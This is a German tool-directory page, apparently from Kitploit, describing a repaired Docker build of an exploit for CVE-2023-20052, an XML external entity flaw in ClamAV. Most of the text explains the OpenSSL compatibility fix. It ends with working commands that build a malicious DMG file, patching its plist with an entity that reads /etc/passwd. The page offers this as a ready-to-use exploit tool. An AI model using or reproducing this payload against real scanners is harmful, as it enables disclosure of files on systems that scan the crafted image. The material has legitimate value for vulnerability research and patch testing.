Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-20052 — Korrigierter Docker-Build für den CVE-2023-20052 ClamAV XXE-Exploit. Behebt Kompilierungsfehler von OpenSSL 3.0 unter Verwendung von Ubuntu 18.04 mit OpenSSL 1.0 für die Kompatibilität von libdmg-hfsplus. Erzeugt schädliche DMG-Dateien für XML-External-Entity-Injection. | Kitploit
Tools/GitHubGitHub/mohitsinghpapola/cve-2023-20052
SchwachstellenanalyseExploitationWebanwendungs-ExploitationFuzzingMalware-AnalyseBinäranalyse
GitHubmohitsinghpapola/cve-2023-20052

CVE-2023-20052

Korrigierter Docker-Build für den CVE-2023-20052 ClamAV XXE-Exploit. Behebt Kompilierungsfehler von OpenSSL 3.0 unter Verwendung von Ubuntu 18.04 mit OpenSSL 1.0 für die Kompatibilität von libdmg-hfsplus. Erzeugt schädliche DMG-Dateien für XML-External-Entity-Injection.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 6 MonatenNoch nicht geprüft

CVE-2023-20052 Exploit - Behobener Build

Behobener Docker-Build für CVE-2023-20052 (ClamAV-XXE-Sicherheitslücke), der tatsächlich kompiliert.

Was fehlerhaft war

Der ursprüngliche Exploit lässt sich auf modernen Systemen nicht erstellen:

  • ❌ Kompatibilitätsfehler mit OpenSSL 3.0
  • ❌ Fehler wegen unvollständigem Typ der HMAC_CTX-Struktur
  • ❌ Fehler wegen impliziter Funktionsdeklaration
  • ❌ Build schlägt bei der Kompilierung von dmg/filevault.c fehl

Was ich behoben habe

  1. Basis-Image geändert: Ubuntu 22.04 → Ubuntu 18.04
  2. OpenSSL-Version behoben: Verwendet libssl1.0-dev (OpenSSL 1.0)
  3. Nicht-interaktiven Modus hinzugefügt: Verhindert Build-Eingabeaufforderungen
  4. Funktionierendes Dockerfile: Kompiliert jetzt tatsächlich erfolgreich

Warum das funktioniert

libdmg-hfsplus verwendet veraltete OpenSSL 1.0-Funktionen:

  • HMAC_CTX_init() / HMAC_CTX_cleanup() (entfernt in OpenSSL 1.1+)
  • Direkte Verwendung der HMAC_CTX-Struktur (undurchsichtig in OpenSSL 1.1+)

Ubuntu 18.04 ist das letzte LTS mit OpenSSL 1.0-Unterstützung.

Build & Verwendung

root@kitploit:~
# Build (takes ~3-5 minutes)
docker build -t cve-2023-20052 .

# Run
docker run -v $(pwd):/exploit -it cve-2023-20052 bash

# Create exploit DMG
genisoimage -D -V "exploit" -no-pad -r -apple -o test.img .
dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>|' -e 's/blkx/&xxe;/' test.dmg -o exploit.dmg

Credits

  • Original-Exploit: nokn0wthing/CVE-2023-20052
  • Behoben von: https://reapsec.com
root@kitploit:~
## Fixed Docker build for CVE-2023-20052 (ClamAV XXE) - Resolves OpenSSL 3.0 compilation errors. Uses Ubuntu 18.04 with OpenSSL 1.0 for compatibility with libdmg-hfsplus
Tool herunterladen